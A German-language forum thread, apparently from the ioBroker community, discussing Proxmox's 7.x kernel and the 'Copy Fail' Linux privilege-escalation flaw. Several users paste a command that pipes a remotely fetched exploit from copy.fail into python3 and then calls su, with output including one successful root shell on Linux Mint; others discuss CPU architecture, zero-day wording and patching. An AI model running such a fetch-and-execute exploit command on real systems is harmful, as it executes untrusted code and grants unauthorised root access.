NEWS
Proxmox - 7er Linux-Kernel wird per APT verteilt ....
-
Dann musst Du aber ggfs mit der Kernel-Verwundbarkeit für "copy fail" leben...
Auf meiner Proxmox-Kiste (in einem LXC-Container)
frigate@ubuntu-frigate-privileged:~$ curl https://copy.fail/exp | python3 && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 2924 0 --:--:-- --:--:-- --:--:-- 2935 Password: su: Authentication failure Password:Auf meinem Linux-Mint-PC
martin@martin-D2836-S1:~$ curl https://copy.fail/exp | python3 && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 5595 0 --:--:-- --:--:-- --:--:-- 5666 # ls '2026-01-26 16-59-47.mp4' Videos output.tem Arduino Vorlagen output_text.txt Auswahl_238.png coral page.htm Bilder ems_esp_flasher programs DemonEditor esp_test_ota_prog.sh pwmkurve.png Dokumente gitea serial_ACM0.shDer Unterschied zwischen PVE und Linux mint ist, dass bei Mint su ohne Passwordeingabe erreicht werden kann...
curl https://copy.fail/exp | python3 && su
echad@chet:~ $ curl https://copy.fail/exp | python3 && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 1389 0 --:--:-- --:--:-- --:--:-- 1389 sh: 1: su: Exec format error -bash: /usr/bin/su: Kann die Binärdatei nicht ausführen: Fehler im Format der Programmdatei echad@chet:~ $[thomas@roamer ~]$ curl https://copy.fail/exp | python3 && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 1054 0 0 Passwort: su: Fehler beim Ändern des Authentifizierungstoken Passwort:Hier funktioniert das nicht.
-
Dann musst Du aber ggfs mit der Kernel-Verwundbarkeit für "copy fail" leben...
Auf meiner Proxmox-Kiste (in einem LXC-Container)
frigate@ubuntu-frigate-privileged:~$ curl https://copy.fail/exp | python3 && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 2924 0 --:--:-- --:--:-- --:--:-- 2935 Password: su: Authentication failure Password:Auf meinem Linux-Mint-PC
martin@martin-D2836-S1:~$ curl https://copy.fail/exp | python3 && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 5595 0 --:--:-- --:--:-- --:--:-- 5666 # ls '2026-01-26 16-59-47.mp4' Videos output.tem Arduino Vorlagen output_text.txt Auswahl_238.png coral page.htm Bilder ems_esp_flasher programs DemonEditor esp_test_ota_prog.sh pwmkurve.png Dokumente gitea serial_ACM0.shDer Unterschied zwischen PVE und Linux mint ist, dass bei Mint su ohne Passwordeingabe erreicht werden kann...
-
curl https://copy.fail/exp | python3 && su
echad@chet:~ $ curl https://copy.fail/exp | python3 && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 1389 0 --:--:-- --:--:-- --:--:-- 1389 sh: 1: su: Exec format error -bash: /usr/bin/su: Kann die Binärdatei nicht ausführen: Fehler im Format der Programmdatei echad@chet:~ $[thomas@roamer ~]$ curl https://copy.fail/exp | python3 && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 1054 0 0 Passwort: su: Fehler beim Ändern des Authentifizierungstoken Passwort:Hier funktioniert das nicht.
-
Hier funktioniert das nicht.
Hat Dein System überhaupt eine Intel x64 CPU?
Dafür ist das Exploit geschrieben.Das heißt aber nicht, dass die Lücke nicht auch auf Kernels für ARM-Prozessoren existiert ....
Der host roamer ja:
[thomas@roamer ~]$ fastfetch ./o. thomas@roamer ./sssso- ------------- `:osssssss+- OS: EndeavourOS x86_64 `:+sssssssssso/. Host: 83A2 (Lenovo V17 G4 IRU) `-/ossssssssssssso/. Kernel: Linux 7.0.2-arch1-1 `-/+sssssssssssssssso+:` Uptime: 47 mins `-:/+sssssssssssssssssso+/. Packages: 1383 (pacman) `.://osssssssssssssssssssso++- Shell: bash 5.3.9 .://+ssssssssssssssssssssssso++: Display (AUO439D): 1920x1080 in 17", 60 Hz [Built-in] .:///ossssssssssssssssssssssssso++: DE: KDE Plasma 6.6.4 `:////ssssssssssssssssssssssssssso+++. WM: KWin (Wayland) `-////+ssssssssssssssssssssssssssso++++- WM Theme: Breeze `..-+oosssssssssssssssssssssssso+++++/` Theme: Breeze (Dark) [Qt], Breeze-Dark [GTK2], Breeze [GTK3] ./++++++++++++++++++++++++++++++/:. Icons: breeze-dark [Qt], breeze-dark [GTK2/3/4] `:::::::::::::::::::::::::------`` Font: Noto Sans (10pt) [Qt], Noto Sans (10pt) [GTK2/3/4] Cursor: breeze (24px) Terminal: konsole 26.4.0 CPU: 13th Gen Intel(R) Core(TM) i5-1335U (12) @ 4.60 GHz GPU: Intel Iris Xe Graphics @ 1.25 GHz [Integrated] Memory: 4.36 GiB / 15.34 GiB (28%) Swap: 0 B / 16.88 GiB (0%) Disk (/): 107.75 GiB / 912.64 GiB (12%) - btrfs Disk (/run/media/thomas/Ventoy): 55.31 GiB / 58.56 GiB (94%) - exfat [External] Local IP (wlan0): 192.168.178.44/24 Battery (L20M3PF0): 59% [Discharging] Locale: de_DE.UTF-8 [thomas@roamer ~]$Auf dem echad (Ist ein Raspberry4) bin ich nur zufällig gewesen.
-
Hier funktioniert das nicht.
Hat Dein System überhaupt eine Intel x64 CPU?
Dafür ist das Exploit geschrieben.Das heißt aber nicht, dass die Lücke nicht auch auf Kernels für ARM-Prozessoren existiert ....
Ich sehe das nicht als "Zero Day" Geschichte
Es ist inzwischen keine Zero Day Lücke mehr, weil ein Beispiel-Exploit veröffentlicht wurde, die Kernel-Entwickler schon 4 Wochen informiert sind (also eher eine 28-Day Lücke), und es Patches gibt ...
Ein Zero Day (auch manchmal „0day“ genannt) ist eine Sicherheitslücke, die den Entwicklern der betroffenen Anwendung noch nicht gemeldet wurde, sodass sie „null Tage Zeit“ hatten, sie zu beheben – daher der Name.
Bist Du der Meinung, dass das die Lücke harmloser macht, sodass man mit dem Einspielen von Fixes länger, als bei einem Zero-Day warten kann?
-
Ich sehe das nicht als "Zero Day" Geschichte
Es ist inzwischen keine Zero Day Lücke mehr, weil ein Beispiel-Exploit veröffentlicht wurde, die Kernel-Entwickler schon 4 Wochen informiert sind (also eher eine 28-Day Lücke), und es Patches gibt ...
Ein Zero Day (auch manchmal „0day“ genannt) ist eine Sicherheitslücke, die den Entwicklern der betroffenen Anwendung noch nicht gemeldet wurde, sodass sie „null Tage Zeit“ hatten, sie zu beheben – daher der Name.
Bist Du der Meinung, dass das die Lücke harmloser macht, sodass man mit dem Einspielen von Fixes länger, als bei einem Zero-Day warten kann?
Deswegen gilt:
However, for most users, the best approach is to install vendor kernel updates and reboot into the patched kernel.
Also was ich auch immer sage: Kiste aktuell halten. Immer und regelmäßig.
-
Ich sehe das nicht als "Zero Day" Geschichte
Es ist inzwischen keine Zero Day Lücke mehr, weil ein Beispiel-Exploit veröffentlicht wurde, die Kernel-Entwickler schon 4 Wochen informiert sind (also eher eine 28-Day Lücke), und es Patches gibt ...
Ein Zero Day (auch manchmal „0day“ genannt) ist eine Sicherheitslücke, die den Entwicklern der betroffenen Anwendung noch nicht gemeldet wurde, sodass sie „null Tage Zeit“ hatten, sie zu beheben – daher der Name.
Bist Du der Meinung, dass das die Lücke harmloser macht, sodass man mit dem Einspielen von Fixes länger, als bei einem Zero-Day warten kann?
Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht? Und wenn ja warum und bitte mit Begründung.
Danke!
-
Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht? Und wenn ja warum und bitte mit Begründung.
Danke!
Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht?
Users and administrators should apply the latest kernel security updates from their distribution as soon as possible.
However, for most users, the best approach is to install vendor kernel updates and reboot into the patched kernel.
-
Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht?
Bist du der festen Überzeugung dass die Copy Fail Sicherheitslücke in einer typischen iobroker Installation NICHT ausgenutzt werden kann?
Im Kernel log steht, dass die Lücke dort am 22.Apr geschlossen wurde
https://lore.kernel.org/linux-cve-announce/?t=20260422135722
https://www.reddit.com/r/Proxmox/comments/1szc46a/this_will_be_fun_cve202631431/
PVE just pushed kernel 7 in non-enterprise and the bug was repaired in kernel 6.19.12 or higher.
-
Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht?
Bist du der festen Überzeugung dass die Copy Fail Sicherheitslücke in einer typischen iobroker Installation NICHT ausgenutzt werden kann?
Im Kernel log steht, dass die Lücke dort am 22.Apr geschlossen wurde
https://lore.kernel.org/linux-cve-announce/?t=20260422135722
https://www.reddit.com/r/Proxmox/comments/1szc46a/this_will_be_fun_cve202631431/
PVE just pushed kernel 7 in non-enterprise and the bug was repaired in kernel 6.19.12 or higher.
Hey! Du scheinst an dieser Unterhaltung interessiert zu sein, hast aber noch kein Konto.
Hast du es satt, bei jedem Besuch durch die gleichen Beiträge zu scrollen? Wenn du dich für ein Konto anmeldest, kommst du immer genau dorthin zurück, wo du zuvor warst, und kannst dich über neue Antworten benachrichtigen lassen (entweder per E-Mail oder Push-Benachrichtigung). Du kannst auch Lesezeichen speichern und Beiträge positiv bewerten, um anderen Community-Mitgliedern deine Wertschätzung zu zeigen.
Mit deinem Input könnte dieser Beitrag noch besser werden 💗
Registrieren Anmelden